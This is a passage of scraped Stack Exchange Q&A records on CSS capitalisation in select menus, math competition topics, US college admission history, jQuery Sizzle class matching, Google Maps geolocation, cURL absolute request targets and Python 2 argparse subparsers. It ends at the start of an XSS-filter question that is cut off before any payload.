I didnt know if anyone had used this package before.\n","meta":{"source":"stackoverflow","title":"Laravel Corcel WooCommerce - Add product categories","dup_signals":{}},"subset":"stackexchange"} +{"text":"Does text-transform: Capitalize work for elements, and if so in which browsers?\n\nQuestion: I have a <code><select><\/code> element within which I would like to Capitalize the text displayed in each <code><option><\/code> tag.\nFor instance, I would like the 2 values here to be Bar and Baz (not bar and baz)\n<code><style>\n option { text-transform: Capitalize; }\n<\/style>\n\n<select name=\"foo\">\n <option value=\"bar\">bar<\/option>\n <option value=\"baz\">baz<\/option>\n<\/select>\n<\/code>\nThis does not appear to work in my Chrome (14.0.835.202) but does work in my Firefox (8.0) and IE 8.\nEdit: Added <code><style><\/code> tag for clarity\nComment: The title of your question mentions \"text-transform: Capitalize\", but the text of the question doesn't show how you're using it. Just `select option { text-transform: capitalize; }`?\nComment: Works if you style 'select' now in Chrome.\nComment: Apparently this was an ongoing bug for Chrome and has been corrected in 16 + 17, but I can't verify as I'm still on 15: http:\/\/code.google.com\/p\/chromium\/issues\/detail?id=31349\nComment: This has since stopped working in FF, works in chrome http:\/\/jsfiddle.net\/dtavqsh6\/\nAnswer: As others have mentioned, this currently a bug in Chrome. The code below is the proper way to do what you're asking:\n<code>select option {text-transform:capitalize}\n<\/code>\nHere's a working fiddle to demonstrate (view in something other than Chrome)\nAdditional Information:\nI think you'll also find that the above method does not work in Safari as well. If you want a cross-browser solution, JavaScript will be your only option.\nIf you're open to it, here's a simple jQuery example:\n<code>$(\"option\").each(function() {\n var $this = $(this);\n $this.text($this.text().charAt(0).toUpperCase() + $this.text().slice(1));\n});\n<\/code>\nAnd a working fiddle.\n\n** UPDATE **\n\nThis question was originally answered in 2011. The above-referenced bug has since been squashed, and the CSS below is enough to capitalize each option in all browsers.\n<code>select, select option {text-transform:capitalize}\n<\/code>\nComment: Works if you style 'select' now in Chrome.\nComment: select option {text-transform:capitalize} not working for firefox\nComment: works best if you do on both actually: `select, select option {text-transform:capitalize}`\nComment: As of 2022 I'm not seeing this working in Chrome to style just the `option`. You can style the `select` but my form uses a font that looks on brand for the form elements to have caps, but the `select option` I want to be `capitalize`, yet it has no effect. Looking in the inspector shows the rule and it's not being overridden, just not supported, even with `!important`.\nComment: As of 2023, this does not appear to work in Firefox\nComment: @Scribblemacher I just tested in firefox and it works properly. 
Are you testing the JS from 2011 or the CSS?\nAnswer: This will work in all browsers:\n<code>select {text-transform:capitalize}\n<\/code>\nComment: When on iphone chrome), only the selected option seems to be capitalised, others in scrollable menu stille are lowercase.\nComment: This works for the displayed\/choosen value only, but when you click on the list , the other elements are not capitalized.\nComment: This one is better, simple and straight forward.\nComment: How could you just capitalize the first word crossbrowser if there are more than one in each option?\nComment: @Marcel I answered this on another thread look for my answer here: http:\/\/stackoverflow.com\/questions\/15242592\/angular-js-how-to-autocapitalize-an-input-field\/22561169#22561169\nAnswer: You could use a small jQuery script to get it working in Chrome too:\nhttp:\/\/jsfiddle.net\/p6wbf\/1\/\nComment: Works if you style 'select' now in Chrome.\nAnswer: select option {text-transform:capitalize} \nUse Above CSS make sure your option values are not in UPPERCASES. if they are, first lower them using strtolower() in PHP and the style will work for you perfectly.\n","meta":{"source":"stackoverflow","title":"Does text-transform: Capitalize work for elements, and if so in which browsers?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Which math subjects should I know well to tutor competitive mathematics?\n\nQuestion: I may one day be interested in teaching students who are preparing for, say, the IMO or other math competitions. However, I haven't found a particularly clear statement about exactly what material is on it. I know they contain algebra, geometry, combinatorics, and number theory, but is there any other well-defined subject that is tested in these competitions? \nI know there are a number of resources for preparing students and teachers for these competitions, but reading a document that is exclusively about the competition feels too narrow--I'd rather learn the subjects that are tested instead, and then apply that knowledge to teaching the competition material.\nAnswer: \nI know they contain algebra, geometry, combinatorics, and number theory, but is there any other well-defined subject that is tested in these competitions? \n\nConsulting Gelca and Andreescu's (2007) Putnam and Beyond, there are also:\n\nmethods of proof\nreal analysis\ntrigonometry\nprobability\n\nand, within each of these \"well-defined subjects,\" many sub-categories.\nAlthough non-exhaustive - and intended for a particular mathematics competition, i.e., the Putnam - I believe this provides a reasonable skeleton. Moreover, drawing again from this same reference, here are the chapter-by-chapter breakdowns of content.\n(Click the first image for a higher-resolution version.)\nComment: [One nice feature of this book, by the way, is that it contains *solutions* for all of its problems!]\nComment: @RoryDaulton I strongly disagree with your assessment of this as \"not on-point.\" The OP asks about topics to read into in preparation for \"the IMO or other math competitions.\" I might also note that some high school students *do* take the Putnam; not many, but nor are there many preparing for the IMO (and IMOers are very likely to take the Putnam, if not in high school then by their first year in college; to score well necessitates tremendous preparation beforehand). 
Still, a single post\/book necessarily excludes topics; if you are aware of other lists, then I hope you will post them, too!\nComment: The OP has the tag \"secondary education,\" so information about a college-level competition such as the Putnam is not on-point.\nComment: Solutions are for faint-hearted problem solvers. I want my math books to torture me :)\nComment: @NiloCK Tear 'em out! Easier to destroy than to create (plus, I happen to like the added challenge of finding alternative solutions: especially ones that [I think] are more \"elegant\" than the book's!).\nAnswer: First of all, it might be worth pointing out that algebra can be split in inequalities, polynomials and functional equations. Not all problems fall in one of these three categories, but I think that approximately four-fifths does. The others are mainly about sequences.\nSome introduction to graph theory (as a part of combinatorics) would also be nice. There aren't many problems about it, but you don't want to get an graph question on the IMO and barely knowing what a graph is. Those graph questions are usually not too hard if you have some experience with them. \nComment: @BenjaminDickman I know. However, your answer (or at least the book) is more focused on contests like Putnam. For example, I think it is a bad idea to cover functional equations with differential equations. They require really different techniques.\nComment: If you check my earlier answer, then you will see (by viewing the first image in its high-res version) that algebra is broken down into several parts (although functional equations are placed later on, in real analysis). Similarly, combinatorics contains sub-categories (e.g., Euler's Formula for planar graphs... though there could certainly be more about graph theory!).\nAnswer: Knowing your math subjects is one thing, but experience with creative problem solving itself is key.\nPolya's 'How to Solve It', while a bit dated in its language, is still a good reference for anyone interested in improving as a problem solver or helping others to improve. This book is light on example problems or mathematical work, but talks generally about the processes which serve us when confronted with difficult problems - reduction to smaller case, finding analogy with simpler problems which we're already able to solve, etc. I'd say that it's required reading in this area.\nIt's been a while since I read it, but I really enjoyed and benefitted from Paul Zeitz's 'Art and Craft of Problem Solving'. This book contains a fair number of problems which exemplify different specific strategies for solving problems - finding and exploiting a symmetry, induction, etc. This one would be useful for preparing lectures \/ lessons on specific mathematical topics and techniques.\nComment: (An irresistible side-note: One of my favorite problems is #3.4.31 in \"A&CoPS\" (2e, p. 107) by Paul Zeitz. Essentially, it says: There are 23 people with integral weight, such that whomever you remove, the remaining 22 can be partitioned into two groups of 11 - each with the same total weight. Prove that all 23 people must weigh the same amount. A few years ago I began to track down this problem's history, from the original formulation with integral weights through the abstraction to weights in $\\mathbb{C}$. 
I recorded my findings in [**MO105400**](http:\/\/mathoverflow.net\/q\/105400\/)...)\n","meta":{"source":"matheducators.stackexchange","title":"Which math subjects should I know well to tutor competitive mathematics?","dup_signals":{}},"subset":"stackexchange"} +{"text":"At what point did high school become a standard prerequisite for university students in the USA?\n\nQuestion: Earlier in US history, it was common for universities to admit students via entrance exam. A quote in this answer quoting Colonial Education explains \"The boys from upper class families were taught be private home tutors and then sent to college or university.\"\nNowadays, a high school diploma or an officially recognized equivalency (such as passing the GED exam) is generally recognized as the standard way to qualify to start studying at a US institution of higher education. Although such a credential is not strictly an absolute requirement even today, the idea of \"finish high school, go to college\" seems to have been standard in the USA at least as far back as the 1950's (with enrollment of \"non-completers\" or \"dropouts\" as the exception to the rule rather than standard practice), as my parents reported to me that essentially the same formal expectations existed then.\nAt what point did graduation from a \"High School\" or the achievement of an equivalency qualification specifically recognized as equivalent to high school become the standard way to get into a university, with other paths becoming the exception rather than the rule?\nYes, I know that it is still possible for someone to be homeschooled, pass the GED at age 18, and then go straightaway to college, but the GED is specifically recognized as high school equivalent, not a truly distinct academic pathway. I'm talking about a time period when there was no concept of a high school equivalency, or when the achievement of a high school qualification was truly an optional part of the process of qualifying for university. That is, an aspiring university student might have chosen to complete a high school qualification because their parents wanted them to, because they wanted the \"high school experience\", because they were being funded to attend, because it was easy for them, etc. but they could have reasonably and without too much head-turning short-circuited the process and\/or followed an older, still common alternative path to a university (e.g. private tutoring toward passing a direct entrance examination, getting sponsorship from a local politician, making a substantial bribe large grant offering, etc.) if they had wanted to.\nAlternately, when was the first time in US history where an incoming Freshman might hear something like, \"Wow, you did the thing where you study at home with private tutors and then get five alumni to endorse your academic abilities? What a weirdo! Nobody does that anymore! If you want to be in the \"cool\" crowd, it's all about getting your high school diploma! I wouldn't be surprised if the university abolishes all those non-high school paths next year.\"\nComment: Here's an essay with some very relevant info: https:\/\/commons.trincoll.edu\/edreform\/2014\/05\/accepted-the-evolution-of-college-admission-requirements\/\nAnswer: \nQuestion:\n At what point did high school become a standard prerequisite for university students in the USA?\n\nThe United States educational system unlike those in Europe is not centralized and thus the above question varies by state and sometimes varies by county. 
So while Massachusetts converted the private high school Boston Latin to become the first public High school in 1820, and 7 years later offered free education to children of all ages including free High school as early as 1827; most of the rest of the United States didn't follow suit for 100 years. \nSecondly the United States secondary school system was a terminal degree. It was not meant to be a preparatory program for higher Education. So while the United States experienced a High School movement from 1910 to 1940. When communities prioritized High school programs as a way to attract people and businesses; leading to mass opening of high schools. \"In 1910 18% of 15- to 18-year-olds were enrolled in a high school; barely 9% of all American 18-year-olds graduated. By 1940, 73% of American youths were enrolled in high school and the median American youth had a high school diploma.\"\nBut that doesn't entirely answer your question because most University students did not matriculate from this public high school system, but from private schools. University degrees remained primarily pursuits for the wealthy and public high school programs remained a terminal free degree for everybody else.\nWhat switched everything up was the \"The Servicemen's Readjustment Act of 1944\" or the GI Bill. This opened the doors of higher education to most of the country. 7.7 million former soldiers took advantage of the GI bill's higher education benefits and 2.2 million of these used their benefits for college. In 1947 Life magazine published a cover story in which they recognized how more than half of all university students were there due to the GI Bill.\n\nThis is when public school graduates first outnumbered private education graduates. This is also when Universities adopted standardized pre-requisites to meet and new demand for their services.\nSo in conclusion, no standardization in US secondary school programs, so the question demands we consider trends. High School Diploma's could not have become standard for College Admission in the United States prior to the High School movement where High Schools graduates became the majority of the population or roughly 1940.. Nor could they become standard for University Admission prior to public High school students being able to afford and becoming the majority in those Universities; and that occurred in 1947.\nSources: \n\nHigh school (North America)\nHow the G.I. Bill Changed the Face of Higher Education in America\nThe High school Movement\nThe GI Bill\nHigher Education in the United States\n","meta":{"source":"history.stackexchange","title":"At what point did high school become a standard prerequisite for university students in the USA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using jQuery's Sizzle Engine to find a class (advanced)\n\nQuestion: What I am attempting to do is see if a jQuery object (or even DOM element for that matter) contains a particular class using the same selectors as the Sizzle engine.\njQuery publicly exposes Sizzle with the following:\n<code>jQuery.find = Sizzle;\njQuery.expr = Sizzle.selectors;\njQuery.expr[\":\"] = jQuery.expr.filters;\njQuery.unique = Sizzle.uniqueSort;\n<\/code>\nI can successfully use the find method to determine that a particular DOM element has a class matching my selector but I cannot seem to find a way to get access to the name of the selector that matched. 
\nEXAMPLE (NOT WORKING AS INTENDED)\n<code>$.fn.extend({\n getMatchingClass: function(selector) {\n return this.each(function() {\n var match = jQuery.find.matches('*[class'+selector+']', [this]);\n \/\/ I would like to return the matching class's FULL NAME,\n \/\/ i.e. lightbox_RESTOFCLASS\n alert(match[0]);\n });\n }\n});\n\nvar class = $('#lightbox').getMatchingClass('^=\"lightbox_\"');\n<\/code>\nIs it possible to use Sizzle to return the class name which matched my selector?\nComment: it could match multiple and different classes..\nAnswer: You could use the <code>attr( name )<\/code> function of the jQuery library ..\nYou could modify your original function to take as parameters both the selector and the attribute to apply it to .. this way you can query the results for the specified attribute value.\n<code>$.fn.extend({\n getMatchingClass: function(attribute, selector) {\n return this.each(function() {\n var match = jQuery.find.matches('*['+attribute+selector+']', [this]);\n \/\/ I would like to return the matching class's FULL NAME,\n \/\/ i.e. lightbox_RESTOFCLASS\n alert( $(match[0]).attr(attribute) );\n });\n }\n});\n<\/code>\nKeep in mind that the selector might match more than one classes. Which result would you want then? a list of all matches ? or just the first (as the alerted value in the example)\n[edit] this does not take into account though the case where you have more than one class on an item ..\nAnswer: Now that I better understand your question, have you tried using native Sizzle selectors to do what you're trying to do? \nThe contains word selector should do what you're looking for:\n<code>$('#lightbox').find(\"[class~='lightbox']\");\n<\/code>\nOnce you have the element, you can then easily get the class name by calling <code>attr(...)<\/code>:\n<code>var className = $('#lightbox').find(\"[class~='lightbox_']\").attr('class');\n<\/code>\nThis will only give you the entire class attribute, not the individual classes for the element. You'd have to <code>split(' ')<\/code> the className to get the individual classes and find a matching class. \n<code>function getSimilarClass(className, searchString) {\n var classes = className.split(' ');\n for(var i = 0; i < classes.length; i++) {\n if (classes[i].indexOf(searchString) != -1) {\n return classes[i];\n }\n }\n return null;\n}\nvar className = $('#lightbox').find(\"[class~='lightbox_']\").attr('class');\nvar match = getSimilarClass(className, \"lightbox_\");\n<\/code>\nThis process has flaws however, since there could be multiple tags with similar classes, which this won't account for, and individual tags could potentially have several classes with similar names.\nComment: @Dan - I would like to find the particular classes *full name* matching a Sizzle selector. For example: If you only know the beginning part of the class name and you would like to find the full name of that class.\nAnswer: of course your selector doesnt have to be \"li\" it can be whatever criteria you do know about the items you want to select. but to get the entire class attribute, just use the .attr(\"class\") selector. 
like this\n<code>$(document).ready(function(){\n $(\"li\").each(function (i) {\n var class = $(this).attr(\"class\");\n alert(class);\n });\n});\n<\/code>\nComment: @Jon - I'm only looking for a particular class match, not the entirety of the class attribute.\nAnswer: I've come up with a non-sizzle solution using a subset of selectors (<code>^=<\/code>, <code>$=<\/code>, <code>*=<\/code>, and <code>=<\/code>) which is fully working. A Sizzle solution would have been nice, however. This should at least demonstrate what the intended functionality of the plugin should do.\n<code>$.fn.getMatchingClass = function(selector) {\n var regex, class, tmp, $this;\n tmp = $(this)[0].className;\n class = selector;\n class = class.replace(\/(\\^|\\*|\\$)?=\/i, '');\n class = class.replace(\/\\\"\/g, '');\n if (selector.indexOf('$=') != -1) {\n regex = new RegExp('[\\\\s]+' + class + '$', 'i');\n } else if (selector.indexOf('^=') != -1) {\n regex = new RegExp('^' + class + '[\\\\s]+', 'i');\n } else if (selector.indexOf('*=') != -1) {\n regex = new RegExp('[a-zA-z0-9_\\\\-]*' + class + '[a-zA-z0-9_\\\\-]*', 'gi');\n } else if (selector.indexOf('=') != -1) {\n regex = new RegExp('^' + class + '$', 'i');\n } else return false;\n return tmp.match(regex);\n}\n\nvar class = $('#myID').getMatchingClass('*=\"lightbox\"');\nvar class2 = $('#myID').getMatchingClass('^=lightbox');\nvar class3 = $('#myID').getMatchingClass('=\"lightbox\"');\nvar class4 = $('#myID').getMatchingClass('$=lightbox');\nalert(class);\nalert(class2);\nalert(class3);\nalert(class4);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Using jQuery's Sizzle Engine to find a class (advanced)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Maps API GeoLocation not working for mobile\n\nQuestion: I'm not really sure why the GeoLocation works on my PC, but not my iPhone ... I've got <code>sensor=true<\/code> within the script call to the API, but apart from that, I'm at a loss. 
Here's the entire script:\n<code> <div id=\"info\"><\/div>\n <div id=\"map_canvas\" style=\"width:908px; height:420px\"><\/div>\n <input type=\"text\" id=\"addressInput\" size=\"10\"\/>\n <select id=\"radiusSelect\">\n <option value=\"5\" selected>5mi<\/option>\n <option value=\"15\" selected>15mi<\/option>\n <option value=\"25\" selected>25mi<\/option>\n <option value=\"100\">100mi<\/option>\n <option value=\"200\">200mi<\/option>\n <option value=\"4000\">4000mi<\/option>\n <\/select>\n <input type=\"button\" value=\"Search\" onclick=\"searchLocations();\">\n <div><select id=\"locationSelect\" style=\"width:100%;visibility:hidden\"><\/select><\/div> \n\n <script type=\"text\/javascript\" src=\"http:\/\/maps.googleapis.com\/maps\/api\/js?key=AIzaSyCe49sI29q0AVNo9iVvQ-lDlDwZpFZuA4o&sensor=true\"><\/script>\n <script type=\"text\/javascript\" src=\"http:\/\/gmaps-samples-v3.googlecode.com\/svn\/trunk\/geolocate\/geometa.js\"><\/script>\n <script type=\"text\/javascript\">\n\n var map;\n var markers = [];\n var infoWindow;\n var locationSelect;\n\n function load() {\n map = new google.maps.Map(document.getElementById(\"map_canvas\"), {\n center: new google.maps.LatLng(40, -100),\n zoom: 4,\n mapTypeId: 'roadmap',\n mapTypeControlOptions: {style: google.maps.MapTypeControlStyle.DROPDOWN_MENU}\n });\n infoWindow = new google.maps.InfoWindow();\n\n locationSelect = document.getElementById(\"locationSelect\");\n locationSelect.onchange = function() {\n var markerNum = locationSelect.options[locationSelect.selectedIndex].value;\n if (markerNum != \"none\") {\n google.maps.event.trigger(markers[markerNum], 'click');\n }\n };\n\n \/\/ geolocation\n prepareGeolocation();\n doGeolocation();\n }\n\n function doGeolocation() {\n if (navigator.geolocation) {\n navigator.geolocation.getCurrentPosition(positionSuccess, positionError);\n } else {\n positionError(-1);\n }\n }\n\n function positionError(err) {\n var msg;\n switch(err.code) {\n case err.UNKNOWN_ERROR:\n msg = \"Unable to find your location\";\n break;\n case err.PERMISSION_DENINED:\n msg = \"Permission denied in finding your location\";\n break;\n case err.POSITION_UNAVAILABLE:\n msg = \"Your location is currently unknown\";\n break;\n case err.BREAK:\n msg = \"Attempt to find location took too long\";\n break;\n default:\n msg = \"Location detection not supported in browser\";\n }\n document.getElementById('info').innerHTML = msg;\n }\n\n function positionSuccess(position) {\n \/\/ Centre the map on the new location\n var coords = position.coords || position.coordinate || position;\n var latLng = new google.maps.LatLng(coords.latitude, coords.longitude);\n map.setCenter(latLng);\n map.setZoom(15);\n var marker = new google.maps.Marker({\n map: map,\n position: latLng,\n title: 'Why, there you are!'\n });\n document.getElementById('info').innerHTML = 'Looking for <b>' +\n coords.latitude + ', ' + coords.longitude + '<\/b>...';\n\n \/\/ And reverse geocode.\n (new google.maps.Geocoder()).geocode({latLng: latLng}, function(resp) {\n var place = \"You're around here somewhere!\";\n if (resp[0]) {\n var bits = [];\n for (var i = 0, I = resp[0].address_components.length; i < I; ++i) {\n var component = resp[0].address_components[i];\n if (contains(component.types, 'political')) {\n bits.push('<b>' + component.long_name + '<\/b>');\n }\n }\n if (bits.length) {\n place = bits.join(' > ');\n }\n marker.setTitle(resp[0].formatted_address);\n }\n document.getElementById('info').innerHTML = place;\n });\n }\n\n function contains(array, item) {\n for (var 
i = 0, I = array.length; i < I; ++i) {\n if (array[i] == item) return true;\n }\n return false;\n }\n\n function searchLocations() {\n console.log(\"searching locations...\");\n var address = document.getElementById(\"addressInput\").value;\n var geocoder = new google.maps.Geocoder();\n geocoder.geocode({address: address}, function(results, status) {\n if (status == google.maps.GeocoderStatus.OK) {\n searchLocationsNear(results[0].geometry.location);\n } else {\n alert(address + ' not found');\n }\n });\n }\n\n function clearLocations() {\n \/\/infoWindow.close();\n for (var i = 0; i < markers.length; i++) {\n markers[i].setMap(null);\n }\n markers.length = 0;\n\n locationSelect.innerHTML = \"\";\n var option = document.createElement(\"option\");\n option.value = \"none\";\n option.innerHTML = \"See all results:\";\n locationSelect.appendChild(option);\n locationSelect.style.visibility = \"visible\";\n }\n\n function searchLocationsNear(center) {\n clearLocations();\n\n var radius = document.getElementById('radiusSelect').value;\n \/* var searchUrl = 'phpsqlajax_search.php?lat=' + center.lat() + '&lng=' + center.lng() + '&radius=' + radius; *\/\n var searchUrl = 'http:\/\/dev-imac.local\/phpsqlajax_search.php?lat=' + center.lat() + '&lng=' + center.lng() + '&radius=' + radius;\n console.log(searchUrl);\n downloadUrl(searchUrl, function(data) {\n var xml = parseXml(data);\n var markerNodes = xml.documentElement.getElementsByTagName(\"marker\");\n var bounds = new google.maps.LatLngBounds();\n for (var i = 0; i < markerNodes.length; i++) {\n var name = markerNodes[i].getAttribute(\"name\");\n var address = markerNodes[i].getAttribute(\"address\");\n var distance = parseFloat(markerNodes[i].getAttribute(\"distance\"));\n var latlng = new google.maps.LatLng(\n parseFloat(markerNodes[i].getAttribute(\"lat\")),\n parseFloat(markerNodes[i].getAttribute(\"lng\")));\n\n createOption(name, distance, i);\n createMarker(latlng, name, address);\n bounds.extend(latlng);\n }\n map.fitBounds(bounds);\n });\n }\n\n function createMarker(latlng, name, address) {\n var html = \"<b>\" + name + \"<\/b> <br\/>\" + address;\n var marker = new google.maps.Marker({\n map: map,\n position: latlng\n });\n google.maps.event.addListener(marker, 'click', function() {\n infoWindow.setContent(html);\n infoWindow.open(map, marker);\n });\n markers.push(marker);\n }\n\n function createOption(name, distance, num) {\n var option = document.createElement(\"option\");\n option.value = num;\n option.innerHTML = name + \"(\" + distance.toFixed(1) + \")\";\n locationSelect.appendChild(option);\n }\n\n function downloadUrl(url, callback) {\n var request = window.ActiveXObject ?\n new ActiveXObject('Microsoft.XMLHTTP') :\n new XMLHttpRequest;\n\n request.onreadystatechange = function() {\n if (request.readyState == 4) {\n request.onreadystatechange = doNothing;\n callback(request.responseText, request.status);\n }\n };\n\n request.open('GET', url, true);\n request.send(null);\n }\n\n function parseXml(str) {\n if (window.ActiveXObject) {\n var doc = new ActiveXObject('Microsoft.XMLDOM');\n doc.loadXML(str);\n return doc;\n } else if (window.DOMParser) {\n return (new DOMParser).parseFromString(str, 'text\/xml');\n }\n }\n\n function doNothing() {}\n\n window.onload = load();\n\n <\/script>\n<\/code>\nAnswer: First of all, \n<code>mapTypeId: 'roadmap',\n<\/code>\nshould be:\n<code>mapTypeId: google.maps.MapTypeId.ROADMAP,\n<\/code>\nbut that should cause it to fail in your PC as well.\nOther than that, your <code><script><\/code> 
section should be in the <code><head><\/code> section of the document and not in the <code><body><\/code>. Maybe the iPhone browser is more strict about this than the browser on your PC. What browser(s) are you using in each system? (I'm guessing you're using IE on the PC. Have you tried other browsers?)\nComment: Safari. And the PC or Mac is not an issue at all... it's just my iPhone.\nComment: I am not familiar with the iPhone browser, but in the case of Android the browsers are very \"minified\", (light weight for mobile), which means they are less tolerant of minor errors and your code needs to be more standard compliant.\nComment: Well, this code is literally all from Google ... no customizations. So I'm not understanding what the issues are.\nComment: I doubt it is written by Google because it has the problems I pointed out in my answer. Does the iPhone browser have an error log?\nComment: https:\/\/developers.google.com\/maps\/articles\/phpsqlsearch_v3 ... https:\/\/developers.google.com\/maps\/articles\/geolocation ... literally written by Google. And even with Safari's Debug console on, there's no error.\nComment: And even when you go to: https:\/\/google-developers.appspot.com\/maps\/documentation\/javascript\/examples\/map-geolocation on your mobile device, it doesn't work. Not making much sense to me...\nComment: The code in the link you posted uses mapTypeId: google.maps.MapTypeId.ROADMAP, as I pointed out in my answer, so your code is **not** original from Google.\nComment: It is in the first link I sent. This is not really something that I want to argue about. Thanks for trying to help.\n","meta":{"source":"stackoverflow","title":"Google Maps API GeoLocation not working for mobile","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to force cURL to send a complete URL as request target?\n\nQuestion: How does I force curl to include the complete URL in the HTTP GET request?\nCurl sends (not working):\n<code>GET \/some\/path HTTP\/1.1\nHost: my-domain-here.com\n...\n<\/code>\nI want it to be (working):\n<code>GET http:\/\/my-domain-here.com\/some\/path HTTP\/1.1\nHost: i2.wp.com\n<\/code>\nSo I want the host to be always included in the GET line. How can I do this using CURL\/PHP?\nThe server can only handle absolute URLs.\nAnswer: The PHP cURL wrapper does not expose a way of doing this as far as I know.\nAlso, cURL will automatically change the <code>Host<\/code> header even if you specify a different one.\nFor example:\n<code>curl -v --dump-header - -0 -H 'Host: my-domain.com' http:\/\/subdomain.my-domain.com\/something.html\n<\/code>\nwill ignore the custom header and send this:\n<code>GET \/something.html HTTP\/1.0\nUser-Agent: curl\/7.35.0\nHost: subdomain.my-domain.com\nAccept: *\/*\n<\/code>\nWhat you can do is build the request manually:\n<code>$host = 'my-domain.com';\n$path = 'http:\/\/subdomain.my-domain.com\/something.html';\n\n$fp = fsockopen($host, 80);\n\nfputs($fp, \"GET $path HTTP\/1.1\\r\\n\");\nfputs($fp, \"Host: $host\\r\\n\");\nfputs($fp, \"Content-type: application\/x-www-form-urlencoded\\r\\n\");\nfputs($fp, \"Content-length: 0\\r\\n\");\nfputs($fp, \"Connection: close\\r\\n\\r\\n\");\n\n$result = ''; \nwhile(!feof($fp)) {\n $result .= fgets($fp, 128);\n}\n\nfclose($fp);\n\necho $result;\n<\/code>\nComment: curl\/7.29.0 does allow to override the Host header.\nAnswer: At least from the command line, curl does send absolute URIs if you configure it to use a HTTP proxy for the request. 
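(A rough illustration, assuming a hypothetical proxy host: something like <code>curl -x proxy.example.com:3128 http:\/\/my-domain-here.com\/some\/path<\/code> should make curl put the absolute form, <code>GET http:\/\/my-domain-here.com\/some\/path HTTP\/1.1<\/code>, in the request line it sends to the proxy.)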
Even if you're not using a proxy, you can specify that that it use the actual server as the proxy server, and your server will then receive the absolute URI in the request.\nComment: cURL using PHP also does this, I'm looking for a way to prevent it and froce cURL to send the relative URL.\nComment: Do you mean like using the flag: `--proxy1.0 example.com:80`?\nAnswer: <code>curl<\/code> has <code>--request-target<\/code> option\nThe following command will\n\nConnect to <code>127.0.0.1<\/code>\nSend request path as <code>GET http:\/\/request.host.name\/path\/ HTTP\/1.1<\/code>\nSet <code>Host<\/code> header to <code>Host: host.header<\/code>\n\n<code>curl http:\/\/127.0.0.1 -v \\\n --request-target http:\/\/request.host.name\/path\/ \\\n --path-as-is \\\n -H \"Host: host.header\"\n<\/code>\n<code>* Trying 127.0.0.1:80...\n* TCP_NODELAY set\n* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)\n> GET http:\/\/request.host.name\/path\/ HTTP\/1.1\n> Host: host.header\n> User-Agent: curl\/7.68.0\n> Accept: *\/*\n>\n* Mark bundle as not supporting multiuse\n< HTTP\/1.1 404 Not Found\n< Server: nginx\/1.14.0\n< Date: Fri, 19 Aug 2022 10:14:14 GMT\n< Content-Type: text\/html\n< Content-Length: 169\n< Connection: keep-alive\n<\n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body bgcolor=\"white\">\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.14.0<\/center>\n<\/body>\n<\/html>\n* Connection #0 to host 127.0.0.1 left intact\n<\/code>\nAnswer: <code>curl<\/code> always acts as a correct HTTP client. The standard requires that the request target (i.e. what follows the GET) only consists of an absolute path and optionally a query.\nSo it is not possible to make <code>curl<\/code> send an absolute URL as request target to an origin server.\n","meta":{"source":"stackoverflow","title":"How to force cURL to send a complete URL as request target?","dup_signals":{}},"subset":"stackexchange"} +{"text":"__init__() got an unexpected keyword argument 'required' using argparse in Python 2\n\nQuestion: I have below python script which if I run with <code>Python 2.7.16<\/code> version then I get an error but if I run with <code>Python 3<\/code> version then it works fine.\nBelow is my code:\n<code>from argparse import ArgumentParser\n\ndef parse_cli_arguments():\n parser = ArgumentParser(\n description='some stuff'\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"verbose output\",\n action=\"store_true\"\n )\n subparser = parser.add_subparsers(\n title=\"action\",\n dest='action',\n required=True,\n help='action sub-command help'\n )\n\n # create the subparser for the \"push\" command\n parser_push = subparser.add_parser(\n 'push',\n help='push help'\n )\n parser_push.add_argument(\n 'environment',\n type=str,\n help='push environment help'\n )\n parser_push.add_argument(\n 'instance',\n type=str,\n help='push instance help'\n )\n parser_push.add_argument(\n 'config',\n type=str,\n help='push config help'\n )\n\n # create the subparser for the \"status\" command\n parser_status = subparser.add_parser(\n 'status',\n help='status help'\n )\n parser_status.add_argument(\n 'environment',\n type=str,\n help='status environment help'\n )\n parser_status.add_argument(\n 'instance',\n type=str,\n help='status instance help'\n )\n return parser\n\ndef main():\n parser = parse_cli_arguments()\n args = parser.parse_args()\n if args.action == 'push':\n print('You chose push:', args.environment, args.instance, args.config)\n elif args.action == 'status':\n print('You chose status:', 
args.environment, args.instance)\n else:\n print('Something unexpected happened')\n\nif __name__ == '__main__':\n main()\n<\/code>\nProblem Statement\nBelow is the error I am getting with Python 2.7.16 version. Any thoughts what wrong am I doing here?\nI need to run my above code on Python 2.7.16 version.\n<code>\u276f python test.py\nTraceback (most recent call last):\n File \"test.py\", line 70, in <module>\n main()\n File \"test.py\", line 59, in main\n parser = parse_cli_arguments()\n File \"test.py\", line 17, in parse_cli_arguments\n help='action sub-command help'\n File \"\/Users\/andy\/.pyenv\/versions\/2.7.16\/lib\/python2.7\/argparse.py\", line 1678, in add_subparsers\n action = parsers_class(option_strings=[], **kwargs)\nTypeError: __init__() got an unexpected keyword argument 'required'\n<\/code>\nDo I need to change some syntax here to make it work with Python2?\nComment: `subparsers` used to be `required` by default, like a regular `positional`. The `required` option in Py3 has a long history. https:\/\/stackoverflow.com\/questions\/22990977\/why-does-this-argparse-code-behave-differently-between-python-2-and-3; https:\/\/stackoverflow.com\/questions\/23349349\/argparse-with-required-subparser\nAnswer: The api between 2.7 and 3 has changed. <code>sub_parsers<\/code> did not previously have the <code>required<\/code> keyword arg.\nHeres the function signature in the 2.7. docs\n<code>ArgumentParser.add_subparsers([title][, description][, prog][, parser_class][, action][, option_string][, dest][, help][, metavar])\n<\/code>\nand here it is in the 3.9 docs\n<code>ArgumentParser.add_subparsers([title][, description][, prog][, parser_class][, action][, option_string][, dest][, required][, help][, metavar])\n<\/code>\nA workaround is suggested by @hpaulj which involves setting the required attribute after the <code>add_subparsers<\/code> call. You can find the answer (and leave any upvotes) here and here.\n","meta":{"source":"stackoverflow","title":"__init__() got an unexpected keyword argument 'required' using argparse in Python 2","dup_signals":{}},"subset":"stackexchange"} +{"text":"XSS - double quote and backslash escaping\n\nQuestion: I'm currently testing my own XSS filter and don't know if I thought everything through, so I need some advice.\nLet's say my code looks like this:\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"USER INPUT\", \"event\": 